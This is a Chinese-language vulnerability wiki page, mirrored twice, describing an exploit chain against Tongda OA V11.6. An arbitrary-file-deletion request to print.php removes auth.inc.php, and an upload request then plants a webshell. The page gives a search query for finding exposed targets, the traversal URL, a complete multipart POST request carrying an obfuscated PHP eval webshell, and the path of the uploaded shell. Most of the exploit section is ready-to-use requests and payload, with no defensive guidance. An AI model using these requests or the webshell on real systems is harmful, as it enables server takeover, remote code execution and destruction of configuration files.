fofamini-wiki

登录白背景

源码

通达OA print.php前台任意文件删除&getshell

一、漏洞简介

通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化系统，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。攻击者可通过任意文件删除漏洞删除auth.inc.php，然后组合文件上传漏洞最终可造成远程代码执行(RCE)漏洞，从而导致服务器权限被拿下。

二、影响版本

通达OA V11.6
⚠注意验证：该漏洞会删除配置文件，破坏系统，谨慎操作。

三、资产测绘

hunterapp.name="通达 OA"

登录页面

四、漏洞复现

POC

访问poc，影响200表示可能存在通达OA任意文件删除漏洞

http://xx.xx.xx.xx/module/appbuilder/assets/print.php

EXP

使用通达OA任意文件上传漏洞删除通达OAauth.inc.php文件

http://xx.xx.xx.xx/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php

通过后台文件上传漏洞上传webshell

POST /general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.%3C%3E./.%3C%3E./.%3C%3E./ HTTP/1.1
Accept-Charset: GBK
Cookie: null;_SERVER=
Cache-Control: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.7 Safari/537.36
Connection: close
Pragma: no-cache
Content-Type: multipart/form-data; boundary=********
Host: xx.xx.xx.xx
Content-Length: 240

--********
Content-Disposition: form-data; name="FILE1"; filename="shell.php"

<?php class Gpl5I2Tc { public function __construct($H9i75){ @eval("/*Zc3W78jv53*/".$H9i75."/*Zc3W78jv53*/"); }}new Gpl5I2Tc($_REQUEST['x']);?>
--********

上传文件位置

http://xx.xx.xx.xx/_shell.php

原文: https://www.yuque.com/xiaokp7/ocvun2/akskbrrgthmultak

# 通达OA print.php前台任意文件删除&getshell

# 一、漏洞简介
通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化系统，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。 攻击者可通过任意文件删除漏洞删除auth.inc.php，然后组合文件上传漏洞最终可造成远程代码执行(RCE)漏洞，从而导致服务器权限被拿下。

# 二、影响版本

- 通达OA V11.6
- ⚠注意验证：该漏洞会删除配置文件，破坏系统，谨慎操作。

# 三、资产测绘

- hunter`app.name="通达 OA"`

![image.png](./img/hLCVnAGvrEGP98bB/1692175272185-2e2eccad-00b6-4598-a978-54d5b591d45a-084141.png)

- 登录页面

![image.png](./img/hLCVnAGvrEGP98bB/1692175288340-990aa042-3b09-4cd8-8ae2-c55104f1b974-520648.png)

# 四、漏洞复现

## POC
访问poc，影响`200`表示可能存在通达OA任意文件删除漏洞
```
http://xx.xx.xx.xx/module/appbuilder/assets/print.php
```
![image.png](./img/hLCVnAGvrEGP98bB/1692175404214-10725c7e-6050-4fac-9b26-8da9888aef1b-524284.png)

## EXP

1. 使用通达OA任意文件上传漏洞删除通达OA`auth.inc.php`文件
```
http://xx.xx.xx.xx/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php
```
![image.png](./img/hLCVnAGvrEGP98bB/1692175869321-903212eb-fee5-4fbc-9670-f2042267b142-347332.png)

2. 通过后台文件上传漏洞上传webshell
```
POST /general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.%3C%3E./.%3C%3E./.%3C%3E./ HTTP/1.1
Accept-Charset: GBK
Cookie: null;_SERVER=
Cache-Control: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.7 Safari/537.36
Connection: close
Pragma: no-cache
Content-Type: multipart/form-data; boundary=********
Host: xx.xx.xx.xx
Content-Length: 240

--********
Content-Disposition: form-data; name="FILE1"; filename="shell.php"

<?php class Gpl5I2Tc { public function __construct($H9i75){ @eval("/*Zc3W78jv53*/".$H9i75."/*Zc3W78jv53*/"); }}new Gpl5I2Tc($_REQUEST['x']);?>
--********
```
![image.png](./img/hLCVnAGvrEGP98bB/1692175705852-018ea812-9e6c-4916-a897-23654503dc96-615108.png)

3. 上传文件位置
```
http://xx.xx.xx.xx/_shell.php
```
![image.png](./img/hLCVnAGvrEGP98bB/1692175772975-13606e74-09b3-4406-9c01-68d59f2f69ba-859802.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/akskbrrgthmultak>